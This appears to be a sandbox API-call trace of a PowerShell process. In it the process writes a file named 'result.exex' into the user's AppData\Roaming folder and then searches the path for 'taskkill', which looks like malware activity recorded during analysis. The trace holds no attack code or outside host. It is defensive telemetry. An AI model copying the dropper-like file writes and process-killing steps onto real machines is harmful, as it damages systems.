[0082.188] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.188] CoTaskMemFree (pv=0x2569a0)
[0082.188] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.188] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.188] CoTaskMemFree (pv=0x2569a0)
[0082.210] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.210] CoTaskMemFree (pv=0x2569a0)
[0082.210] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a8
[0082.210] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x358
[0082.211] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x37c
[0082.211] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x380
[0082.211] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x384
[0082.211] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x388
[0082.211] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x38c
[0082.211] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x390
[0082.211] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3ac
[0082.211] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x378
[0082.211] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x398
[0082.211] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x39c
[0082.211] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.211] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.211] CoTaskMemFree (pv=0x2569a0)
[0082.212] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0082.213] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x16d9a0 | out: lpMode=0x16d9a0) returned 1
[0082.213] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.213] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.213] CoTaskMemFree (pv=0x2569a0)
[0082.215] SetEvent (hEvent=0x380) returned 1
[0082.215] SetEvent (hEvent=0x3a8) returned 1
[0082.215] SetEvent (hEvent=0x358) returned 1
[0082.215] SetEvent (hEvent=0x37c) returned 1
[0082.215] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x30c
[0082.216] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.216] CoTaskMemFree (pv=0x2569a0)
[0082.216] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6f8 | out: phkResult=0x16d6f8*=0x310) returned 0x0
[0082.216] RegQueryValueExW (in: hKey=0x310, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x16d67c, lpData=0x0, lpcbData=0x16d678*=0x0 | out: lpType=0x16d67c*=0x0, lpData=0x0, lpcbData=0x16d678*=0x0) returned 0x2
Thread:
id = 91
os_tid = 0xa0c
Thread:
id = 94
os_tid = 0xa14
Thread:
id = 96
os_tid = 0x9a8
Thread:
id = 101
os_tid = 0xa48
Thread:
id = 102
os_tid = 0xa58
[0069.216] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0077.928] LocalFree (hMem=0x264640) returned 0x0
[0077.929] CloseHandle (hObject=0x324) returned 1
[0077.929] CloseHandle (hObject=0x13) returned 1
[0077.929] CloseHandle (hObject=0xf) returned 1
[0077.929] RegCloseKey (hKey=0x310) returned 0x0
[0077.930] RegCloseKey (hKey=0x30c) returned 0x0
[0077.930] RegCloseKey (hKey=0x308) returned 0x0
[0077.930] LocalFree (hMem=0x264610) returned 0x0
[0077.930] RegCloseKey (hKey=0x330) returned 0x0
[0080.908] RegCloseKey (hKey=0x374) returned 0x0
[0080.908] RegCloseKey (hKey=0x370) returned 0x0
[0080.908] RegCloseKey (hKey=0x36c) returned 0x0
[0080.908] RegCloseKey (hKey=0x368) returned 0x0
[0080.908] RegCloseKey (hKey=0x364) returned 0x0
[0080.909] RegCloseKey (hKey=0x360) returned 0x0
[0080.909] RegCloseKey (hKey=0x35c) returned 0x0
[0080.909] RegCloseKey (hKey=0x3a4) returned 0x0
[0080.909] RegCloseKey (hKey=0x3a0) returned 0x0
[0080.909] RegCloseKey (hKey=0x34c) returned 0x0
[0080.909] RegCloseKey (hKey=0x348) returned 0x0
[0080.909] RegCloseKey (hKey=0x344) returned 0x0
[0080.910] RegCloseKey (hKey=0x340) returned 0x0
[0080.910] RegCloseKey (hKey=0x33c) returned 0x0
[0080.910] RegCloseKey (hKey=0x338) returned 0x0
[0080.910] RegCloseKey (hKey=0x334) returned 0x0
[0080.910] RegCloseKey (hKey=0x310) returned 0x0
[0080.910] RegCloseKey (hKey=0x30c) returned 0x0
[0080.910] RegCloseKey (hKey=0x39c) returned 0x0
[0080.911] RegCloseKey (hKey=0x398) returned 0x0
[0080.911] RegCloseKey (hKey=0x378) returned 0x0
[0080.911] RegCloseKey (hKey=0x3ac) returned 0x0
[0080.911] RegCloseKey (hKey=0x390) returned 0x0
[0080.911] RegCloseKey (hKey=0x38c) returned 0x0
[0080.911] RegCloseKey (hKey=0x388) returned 0x0
[0080.911] RegCloseKey (hKey=0x384) returned 0x0
[0080.912] RegCloseKey (hKey=0x380) returned 0x0
[0080.912] RegCloseKey (hKey=0x37c) returned 0x0
[0080.912] RegCloseKey (hKey=0x358) returned 0x0
[0080.912] RegCloseKey (hKey=0x3a8) returned 0x0
[0080.912] RegCloseKey (hKey=0x308) returned 0x0
[0085.043] RegCloseKey (hKey=0x310) returned 0x0
[0086.223] CloseHandle (hObject=0x1f) returned 1
[0086.223] RegCloseKey (hKey=0x3c0) returned 0x0
[0086.223] CloseHandle (hObject=0x1b) returned 1
[0086.224] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.224] RegCloseKey (hKey=0x3bc) returned 0x0
[0086.224] CloseHandle (hObject=0xdf) returned 1
[0086.224] CloseHandle (hObject=0x17) returned 1
[0086.225] CloseHandle (hObject=0x13) returned 1
[0086.225] CloseHandle (hObject=0xf) returned 1
[0086.225] RegCloseKey (hKey=0x3b8) returned 0x0
[0086.225] RegCloseKey (hKey=0x3e4) returned 0x0
[0086.226] CloseHandle (hObject=0xdb) returned 1
[0086.226] CloseHandle (hObject=0xd7) returned 1
[0086.226] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.226] CloseHandle (hObject=0x8b) returned 1
[0086.227] CloseHandle (hObject=0x87) returned 1
[0086.227] CloseHandle (hObject=0x83) returned 1
[0086.227] RegCloseKey (hKey=0x410) returned 0x0
[0086.227] CloseHandle (hObject=0x10f) returned 1
[0086.228] CloseHandle (hObject=0x10b) returned 1
[0086.228] CloseHandle (hObject=0x107) returned 1
[0086.228] RegCloseKey (hKey=0x424) returned 0x0
[0086.228] CloseHandle (hObject=0xd3) returned 1
[0086.228] CloseHandle (hObject=0x7f) returned 1
[0086.229] CloseHandle (hObject=0x7b) returned 1
[0086.229] CloseHandle (hObject=0x77) returned 1
[0086.229] RegCloseKey (hKey=0x408) returned 0x0
[0086.229] CloseHandle (hObject=0xcf) returned 1
[0086.230] CloseHandle (hObject=0xcb) returned 1
[0086.230] RegCloseKey (hKey=0x428) returned 0x0
[0086.230] RegCloseKey (hKey=0x41c) returned 0x0
[0086.230] CloseHandle (hObject=0x73) returned 1
[0086.231] CloseHandle (hObject=0x6f) returned 1
[0086.231] CloseHandle (hObject=0x6b) returned 1
[0086.231] RegCloseKey (hKey=0x394) returned 0x0
[0086.231] RegCloseKey (hKey=0x3e0) returned 0x0
[0086.231] RegCloseKey (hKey=0x40c) returned 0x0
[0086.231] CloseHandle (hObject=0x103) returned 1
[0086.232] CloseHandle (hObject=0xc7) returned 1
[0086.232] RegCloseKey (hKey=0x374) returned 0x0
[0086.232] CloseHandle (hObject=0xc3) returned 1
[0086.232] RegCloseKey (hKey=0x3dc) returned 0x0
[0086.232] CloseHandle (hObject=0xbf) returned 1
[0086.233] RegCloseKey (hKey=0x370) returned 0x0
[0086.233] CloseHandle (hObject=0xff) returned 1
[0086.233] CloseHandle (hObject=0x67) returned 1
[0086.233] CloseHandle (hObject=0x63) returned 1
[0086.234] RegCloseKey (hKey=0x36c) returned 0x0
[0086.234] RegCloseKey (hKey=0x3d8) returned 0x0
[0086.235] RegCloseKey (hKey=0x42c) returned 0x0
[0086.235] RegCloseKey (hKey=0x3d4) returned 0x0
[0086.235] RegCloseKey (hKey=0x418) returned 0x0
[0086.236] RegCloseKey (hKey=0x404) returned 0x0
[0086.237] RegCloseKey (hKey=0x3fc) returned 0x0
[0086.238] RegCloseKey (hKey=0x368) returned 0x0
[0086.238] RegCloseKey (hKey=0x3f8) returned 0x0
[0086.238] RegCloseKey (hKey=0x364) returned 0x0
[0086.239] RegCloseKey (hKey=0x360) returned 0x0
[0086.239] RegCloseKey (hKey=0x3f4) returned 0x0
[0086.239] RegCloseKey (hKey=0x3d0) returned 0x0
[0086.240] RegCloseKey (hKey=0x3a4) returned 0x0
[0086.241] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.242] RegCloseKey (hKey=0x3c8) returned 0x0
[0086.242] RegCloseKey (hKey=0x414) returned 0x0
[0086.242] RegCloseKey (hKey=0x3c4) returned 0x0
[0086.244] RegCloseKey (hKey=0x35c) returned 0x0
[0086.245] RegCloseKey (hKey=0x34c) returned 0x0
[0086.246] RegCloseKey (hKey=0x420) returned 0x0
[0086.246] RegCloseKey (hKey=0x3a0) returned 0x0
[0086.246] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.247] RegCloseKey (hKey=0x310) returned 0x0
[0086.247] RegCloseKey (hKey=0x3ec) returned 0x0
[0087.323] CloseHandle (hObject=0x3d7) returned 1
[0087.331] RegCloseKey (hKey=0x4f4) returned 0x0
[0087.331] CloseHandle (hObject=0x4f3) returned 1
[0087.331] CloseHandle (hObject=0x16b) returned 1
[0087.331] CloseHandle (hObject=0x167) returned 1
[0087.332] CloseHandle (hObject=0x163) returned 1
[0087.332] CloseHandle (hObject=0x477) returned 1
[0087.332] RegCloseKey (hKey=0x4f0) returned 0x0
[0087.332] RegCloseKey (hKey=0x42c) returned 0x0
[0087.333] CloseHandle (hObject=0x15f) returned 1
[0087.333] CloseHandle (hObject=0x15b) returned 1
[0087.333] CloseHandle (hObject=0x157) returned 1
[0087.333] RegCloseKey (hKey=0x528) returned 0x0
[0087.334] RegCloseKey (hKey=0x5e4) returned 0x0
[0087.334] CloseHandle (hObject=0x153) returned 1
[0087.334] CloseHandle (hObject=0x14f) returned 1
[0087.334] CloseHandle (hObject=0x14b) returned 1
[0087.335] RegCloseKey (hKey=0x600) returned 0x0
[0087.335] RegCloseKey (hKey=0x524) returned 0x0
[0087.335] CloseHandle (hObject=0x44b) returned 1
[0087.335] CloseHandle (hObject=0x447) returned 1
[0087.335] CloseHandle (hObject=0x443) returned 1
[0087.336] CloseHandle (hObject=0x147) returned 1
[0087.336] CloseHandle (hObject=0x143) returned 1
[0087.336] CloseHandle (hObject=0x13f) returned 1
[0087.337] CloseHandle (hObject=0x473) returned 1
[0087.337] CloseHandle (hObject=0x46f) returned 1
[0087.337] RegCloseKey (hKey=0x3d4) returned 0x0
[0087.337] RegCloseKey (hKey=0x5e0) returned 0x0
[0087.337] CloseHandle (hObject=0x543) returned 1
[0087.338] CloseHandle (hObject=0x13b) returned 1
[0087.338] CloseHandle (hObject=0x137) returned 1
[0087.338] RegCloseKey (hKey=0x418) returned 0x0
[0087.338] CloseHandle (hObject=0x133) returned 1
[0087.339] CloseHandle (hObject=0x53f) returned 1
[0087.342] CloseHandle (hObject=0x173) returned 1
[0087.342] CloseHandle (hObject=0x16f) returned 1
[0087.342] RegCloseKey (hKey=0x52c) returned 0x0
[0087.342] CloseHandle (hObject=0x43f) returned 1
[0087.343] CloseHandle (hObject=0x43b) returned 1
[0087.343] RegCloseKey (hKey=0x404) returned 0x0
[0087.343] CloseHandle (hObject=0x437) returned 1
[0087.344] CloseHandle (hObject=0x12f) returned 1
[0087.344] RegCloseKey (hKey=0x3fc) returned 0x0
[0087.344] CloseHandle (hObject=0x12b) returned 1
[0087.344] CloseHandle (hObject=0x127) returned 1
[0087.345] CloseHandle (hObject=0x123) returned 1
[0087.345] CloseHandle (hObject=0x11f) returned 1
[0087.345] RegCloseKey (hKey=0x4ec) returned 0x0
Thread:
id = 109
os_tid = 0x9ac
[0082.225] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0082.232] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
[0082.238] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.238] CoTaskMemFree (pv=0x2569a0)
[0082.239] VirtualQuery (in: lpAddress=0x1c81dca0, lpBuffer=0x1c81eb60, dwLength=0x30 | out: lpBuffer=0x1c81eb60*(BaseAddress=0x1c81d000, AllocationBase=0x1be90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.274] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.274] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.275] CoTaskMemFree (pv=0x2569a0)
[0082.276] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.276] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.276] CoTaskMemFree (pv=0x2569a0)
[0082.278] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.278] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.278] CoTaskMemFree (pv=0x2569a0)
[0082.297] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.297] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.297] CoTaskMemFree (pv=0x2569a0)
[0082.320] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.320] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.320] CoTaskMemFree (pv=0x2569a0)
[0082.320] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.321] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.321] CoTaskMemFree (pv=0x2569a0)
[0082.329] VirtualQuery (in: lpAddress=0x1c81df50, lpBuffer=0x1c81ee10, dwLength=0x30 | out: lpBuffer=0x1c81ee10*(BaseAddress=0x1c81d000, AllocationBase=0x1be90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0082.329] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.329] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.329] CoTaskMemFree (pv=0x2569a0)
[0082.331] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.331] CoTaskMemFree (pv=0x2569a0)
[0082.331] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.331] CoTaskMemFree (pv=0x2569a0)
[0082.332] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.332] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.332] CoTaskMemFree (pv=0x2569a0)
[0082.348] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.348] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.348] CoTaskMemFree (pv=0x2569a0)
[0082.434] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.434] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.434] CoTaskMemFree (pv=0x2569a0)
[0082.435] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.435] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.435] CoTaskMemFree (pv=0x2569a0)
[0082.462] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.462] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.462] CoTaskMemFree (pv=0x2569a0)
[0082.474] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.474] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.474] CoTaskMemFree (pv=0x2569a0)
[0082.476] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.476] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.476] CoTaskMemFree (pv=0x2569a0)
[0082.477] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.477] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.477] CoTaskMemFree (pv=0x2569a0)
[0082.478] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.478] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.478] CoTaskMemFree (pv=0x2569a0)
[0082.509] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.509] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.509] CoTaskMemFree (pv=0x2569a0)
[0082.543] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.543] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0082.543] CoTaskMemFree (pv=0x2569a0)
[0082.544] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.544] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x21
[0082.544] CoTaskMemFree (pv=0x2569a0)
[0082.562] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0082.562] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x21
[0082.562] CoTaskMemFree (pv=0x2569a0)
[0083.127] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\result.exex", nBufferLength=0x105, lpBuffer=0x1c81da50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\result.exex", lpFilePart=0x0) returned 0x2d
[0083.127] SetErrorMode (uMode=0x1) returned 0x1
[0083.127] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\result.exex" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\result.exex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x348
[0083.128] GetFileType (hFile=0x348) returned 0x1
[0083.128] SetErrorMode (uMode=0x1) returned 0x1
[0083.128] GetFileType (hFile=0x348) returned 0x1
[0083.128] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0083.128] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
[0083.128] CoTaskMemFree (pv=0x2569a0)
[0083.129] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0083.129] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
[0083.129] CoTaskMemFree (pv=0x2569a0)
[0083.157] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0083.157] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
[0083.157] CoTaskMemFree (pv=0x2569a0)
[0083.160] CoTaskMemAlloc (cb=0x104) returned 0x2569a0
[0083.160] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2569a0, nSize=0x80 | out: lpBuffer="") returned 0xc0
[0083.160] CoTaskMemFree (pv=0x2569a0)
[0083.160] CoTaskMemAlloc (cb=0x184) returned 0x1b837b80
[0083.160] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b837b80, nSize=0xc0 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0xbf
[0083.160] CoTaskMemFree (pv=0x1b837b80)
[0083.169] CoTaskMemAlloc (cb=0x20e) returned 0x31c860
[0083.169] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x31c860 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19
[0083.169] CoTaskMemFree (pv=0x31c860)
[0083.172] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x47
[0083.172] SetErrorMode (uMode=0x1) returned 0x1
[0083.174] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\taskkill.ps1", lpFindFileData=0x1c81dbd0 | out: lpFindFileData=0x1c81dbd0) returned 0xffffffffffffffff
[0083.274] SetErrorMode (uMode=0x1) returned 0x1
[0083.275] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x47
[0083.275] SetErrorMode (uMode=0x1) returned 0x1
[0083.275] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\taskkill.psm1", lpFindFileData=0x1c81dbd0 | out: lpFindFileData=0x1c81dbd0) returned 0xffffffffffffffff
[0083.280] SetErrorMode (uMode=0x1) returned 0x1
[0083.281] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x47
[0083.281] SetErrorMode (uMode=0x1) returned 0x1
[0083.281] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\taskkill.psd1", lpFindFileData=0x1c81dbd0 | out: lpFindFileData=0x1c81dbd0) returned 0xffffffffffffffff
[0083.284] SetErrorMode (uMode=0x1) returned 0x1
[0083.285] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x47
[0083.285] SetErrorMode (uMode=0x1) returned 0x1
[0083.285] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\taskkill.COM", lpFindFileData=0x1c81dbd0 | out: lpFindFileData=0x1c81dbd0) returned 0xffffffffffffffff
[0083.285] SetErrorMode (uMode=0x1) returned 0x1
[0083.286] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x47
[0083.286] SetErrorMode (uMode=0x1) returned 0x1
[0083.286] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\taskkill.EXE", lpFindFileData=0x1c81dbd0 | out: lpFindFileData=0x1c81dbd0) returned 0xffffffffffffffff
[0083.286] SetErrorMode (uMode=0x1) returned 0x1
[0083.286] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x47
[0083.287] SetErrorMode (uMode=0x1) returned 0x1
[0083.287] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\taskkill.BAT", lpFindFileData=0x1c81dbd0 | out: lpFindFileData=0x1c81dbd0) returned 0xffffffffffffffff
[0083.287] SetErrorMode (uMode=0x1) returned 0x1
[0083.287] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x47
[0083.287] SetErrorMode (uMode=0x1) returned 0x1
[0083.287] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\taskkill.CMD", lpFindFileData=0x1c81dbd0 | out: lpFindFileData=0x1c81dbd0) returned 0xffffffffffffffff
[0083.288] SetErrorMode (uMode=0x1) returned 0x1
[0083.288] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x47
[0083.288] SetErrorMode (uMode=0x1) returned 0x1
[0083.288] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\taskkill.VBS", lpFindFileData=0x1c81dbd0 | out: lpFindFileData=0x1c81dbd0) returned 0xffffffffffffffff
[0083.289] SetErrorMode (uMode=0x1) returned 0x1
